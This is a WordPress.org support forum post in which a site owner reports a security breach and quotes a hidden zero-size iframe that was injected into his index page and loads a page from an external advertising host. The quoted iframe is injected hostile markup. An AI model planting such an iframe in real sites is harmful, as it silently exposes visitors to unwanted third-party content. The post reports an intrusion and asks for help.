WordPress.org

Support

Support » How-To and Troubleshooting » SECURITY BREACH? – somebody has added transparent iframe

SECURITY BREACH? – somebody has added transparent iframe

  • A couple of pop ups have just started to appear on my site once the front page is clicked

    <iframe width="0" height="0" allowtransparency="false" frameborder="0" hspace="0" vspace="0" marginheight="0" marginwidth="0" scrolling="no" src="http://creditburner.blueadvertise.com/n_b72890.php?uid=eHRhYW14"></iframe>

    A quick search through the code reveals some code that has been added which puts in a transparent iframe at the bottom of the index page.

    No idea how they got there …its not my work … I have not altered any code recently but I have just updated to 2.8

    Anybody else getting this?

    ciao
    keane

    http://www.barganews.com

Viewing 2 replies - 1 through 2 (of 2 total)
Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘SECURITY BREACH? – somebody has added transparent iframe’ is closed to new replies.
Skip to toolbar